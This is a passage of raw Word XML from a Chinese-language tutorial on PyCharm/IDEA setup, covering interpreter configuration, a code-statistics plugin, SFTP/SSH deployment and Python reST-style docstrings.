      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最终等待此处完成即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F86B0F" w14:textId="680B23CA" w:rsidR="00BF3948" w:rsidRDefault="00955410" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E68EF1A" wp14:editId="20D8516B">
            <wp:extent cx="5274310" cy="3105150"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1416612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12884" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId291"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3105150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="175C22B8" w14:textId="464363E5" w:rsidR="00C449A2" w:rsidRDefault="001F1811" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pycharm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查到安装包的版本需要更新，则更新。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FF7D26" w14:textId="0384ABB7" w:rsidR="001F1811" w:rsidRDefault="001F1811" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13BC3B4A" wp14:editId="43B1D807">
            <wp:extent cx="5274310" cy="3001645"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="2045649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49336" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId292"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3001645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A04EBAC" w14:textId="77777777" w:rsidR="001F1811" w:rsidRDefault="001F1811" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31B3EBBE" w14:textId="417CDA94" w:rsidR="00C449A2" w:rsidRDefault="00955410" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>至此，解释器设置成功，按住</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ctrl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，鼠标移动到任何函数代码，都显示可调式的高亮。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7636A3E1" w14:textId="77777777" w:rsidR="00955410" w:rsidRDefault="00955410" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F1451B8" w14:textId="2ED4E1DB" w:rsidR="00E7655F" w:rsidRDefault="00E7655F" w:rsidP="00E7655F">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码行数统计</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E8EEEC" w14:textId="77777777" w:rsidR="00E7655F" w:rsidRDefault="00E7655F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68E6904A" w14:textId="0861AB8D" w:rsidR="00E7655F" w:rsidRDefault="00435D85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装插件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>statistic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5AEB20" w14:textId="2DB5E185" w:rsidR="00E7655F" w:rsidRDefault="00435D85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35998442" wp14:editId="19E5E032">
            <wp:extent cx="5274310" cy="920750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="770486718" name="图片 1"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86718" name="图片 1" descr="电脑萤幕画面&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId293"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="920750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5EA996" w14:textId="4E437BDB" w:rsidR="00435D85" w:rsidRDefault="00435D85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以统计当前项目的不同类型代码、统计规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68555B0C" w14:textId="77777777" w:rsidR="00E7655F" w:rsidRDefault="00E7655F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FA64F9C" w14:textId="77777777" w:rsidR="00E7655F" w:rsidRDefault="00E7655F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BFED1DA" w14:textId="77777777" w:rsidR="00E7655F" w:rsidRPr="00510B09" w:rsidRDefault="00E7655F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="157F2F47" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="836" w:name="_Toc159780256"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常用快捷键</w:t>
      </w:r>
      <w:bookmarkEnd w:id="836"/>
    </w:p>
    <w:p w14:paraId="4B4564A6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ctrl alt shift x </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部署</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40331470" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02A3E841" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="837" w:name="_Toc159780257"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>增加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SFTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部署</w:t>
      </w:r>
      <w:bookmarkEnd w:id="837"/>
    </w:p>
    <w:p w14:paraId="6511B7BD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2953CFB2" w14:textId="577E8E14" w:rsidR="008B7ACD" w:rsidRDefault="008B7ACD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> IDEA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目，如图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1F9D48" w14:textId="6EDE89CB" w:rsidR="008B7ACD" w:rsidRDefault="008B7ACD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A59124D" wp14:editId="32B16EAD">
            <wp:extent cx="5274310" cy="2962910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="699490009" name="图片 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90009" name="图片 1" descr="电脑萤幕的截图&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId294"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2962910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="188A5029" w14:textId="31A7B21D" w:rsidR="008B7ACD" w:rsidRPr="008B7ACD" w:rsidRDefault="008B7ACD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>点击加号减号就可以新增部署。如果部署中没有目标的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则需要先添加“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解释器”，远程解释器里写新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这里的部署才会有新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账密连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2DD138" w14:textId="77777777" w:rsidR="008B7ACD" w:rsidRDefault="008B7ACD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76F47CD6" w14:textId="77777777" w:rsidR="008B7ACD" w:rsidRDefault="008B7ACD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73C2BB5B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="109A7FE8" w14:textId="06F2405E" w:rsidR="004C452C" w:rsidRDefault="00AB4214" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="838" w:name="_Toc159780258"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数文档</w:t>
      </w:r>
      <w:bookmarkEnd w:id="838"/>
    </w:p>
    <w:p w14:paraId="67250244" w14:textId="77777777" w:rsidR="00AB4214" w:rsidRDefault="00AB4214" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BBDC342" w14:textId="77777777" w:rsidR="000F457E" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，函数的文档字符串（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docstring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）通常被用来描述函数的功能、参数、返回值以及可能的异常等信息。这些文档字符串被包裹在一对三个双引号之间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F8B555" w14:textId="77777777" w:rsidR="000F457E" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05516F8D" w14:textId="77777777" w:rsidR="000F457E" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一种常见的格式是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>reStructuredText</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>reST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）格式，这是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的官方文档所使用的格式。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>reST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式下，函数的参数（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>param</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）和返回值（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）可以这样标注：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BF52AD" w14:textId="77777777" w:rsidR="000F457E" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00D37B43" w14:textId="77777777" w:rsidR="000F457E" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def function_name(param1, param2):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2C6699" w14:textId="77777777" w:rsidR="000F457E" w:rsidRPr="00CC17C5" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC17C5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E68E154" w14:textId="77777777" w:rsidR="000F457E" w:rsidRPr="00CC17C5" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC17C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC17C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这是一个函数的简单描述。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789933DF" w14:textId="77777777" w:rsidR="000F457E" w:rsidRPr="00CC17C5" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2867E27B" w14:textId="77777777" w:rsidR="000F457E" w:rsidRPr="00CC17C5" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC17C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    :param param1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC17C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这是</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC17C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>param1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC17C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的描述。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346854E3" w14:textId="77777777" w:rsidR="000F457E" w:rsidRPr="00CC17C5" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC17C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    :type param1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC17C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这是</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC17C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>param1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC17C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的类型。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218D57E4" w14:textId="77777777" w:rsidR="000F457E" w:rsidRPr="00CC17C5" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC17C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    :param param2: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC17C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这是</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC17C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>param2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC17C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的描述。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46718DFC" w14:textId="77777777" w:rsidR="000F457E" w:rsidRPr="00CC17C5" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC17C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    :type param2: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC17C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这是</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC17C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>param2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC17C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的类型。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D60D351" w14:textId="77777777" w:rsidR="000F457E" w:rsidRPr="00CC17C5" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC17C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    :return: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC17C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这是返回值的描述。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56978AF0" w14:textId="77777777" w:rsidR="000F457E" w:rsidRPr="00CC17C5" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC17C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    :rtype: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC17C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这是返回值的类型。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBA0217" w14:textId="77777777" w:rsidR="000F457E" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC17C5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EEEB39" w14:textId="77777777" w:rsidR="000F457E" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C2AC65" w14:textId="77777777" w:rsidR="000F457E" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F5C6B7F" w14:textId="77777777" w:rsidR="000F457E" w:rsidRDefault="000F457E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此外，你也可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NumPy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>风格的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docstring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>风格的例子：</w:t>
      </w:r>
    </w:p>
